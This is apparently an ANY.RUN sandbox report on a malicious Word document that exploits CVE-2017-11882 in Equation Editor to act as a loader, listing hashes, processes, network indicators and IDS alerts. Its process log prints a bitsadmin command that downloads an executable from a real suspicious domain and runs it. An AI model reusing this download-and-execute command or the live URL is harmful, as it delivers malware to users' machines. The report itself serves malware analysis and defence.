analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a1673780273226028dc98f22e07262412b4dad50d62c1bf34f47e40289e2b8f0.doc

Full analysis: https://app.any.run/tasks/3719d777-a9e0-4409-887c-12c145b808a4
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 15, 2019, 02:32:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
opendir
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

C53D471B70CBCC4D698B1E0AF270AC0C

SHA1:

5F7F4ADE999E3BC19A5DE7135B937C0F196B0187

SHA256:

A1673780273226028DC98F22E07262412B4DAD50D62C1BF34F47E40289E2B8F0

SSDEEP:

6144:K7p1JCaor5eQAMW8zXO0E456gQ+HFK9ANbQEPX+sPdqq9mZiXAMxqE6lJcRwYJhL:X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Hjb.exe (PID: 2868)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3296)
    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 3964)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3296)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2872)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2872)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs bitsadmin.exe no specs hjb.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2872"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a1673780273226028dc98f22e07262412b4dad50d62c1bf34f47e40289e2b8f0.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3296"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3964cmd.exe /c bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe %USERPROFILE%\Hjb.exe && start %USERPROFILE%\Hjb.exeC:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2392bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe C:\Users\admin\Hjb.exe C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2868C:\Users\admin\Hjb.exe C:\Users\admin\Hjb.execmd.exe
User:
admin
Company:
Company name
Integrity Level:
MEDIUM
Description:
How is seen in task manager
Version:
1.0.0.0
Total events
1 382
Read events
728
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2872WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE488.tmp.cvr
MD5:
SHA256:
2872WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F5BAEDB7EE75A214F9DB82C09081C1BC
SHA256:7E10CBAD76460568F638B5846F4742724B0DEF30A8D2D585CDEDC1791B831CE4
2872WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$673780273226028dc98f22e07262412b4dad50d62c1bf34f47e40289e2b8f0.docpgc
MD5:7F04A3A601B9C64E95DB16634C15599D
SHA256:FC74D6FCF0F073F8AF24257AE9F7FF5B72AE0C647CFC165718C12CBF9DDEF768
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
80.82.222.59:80
http://innovarefining.club/Abiguy/bigg.exe
DE
suspicious
GET
200
80.82.222.59:80
http://innovarefining.club/Abiguy/bigg.exe
DE
executable
867 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
80.82.222.59:80
innovarefining.club
myLoc managed IT AG
DE
suspicious

DNS requests

Domain
IP
Reputation
innovarefining.club
  • 80.82.222.59
suspicious

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
No debug info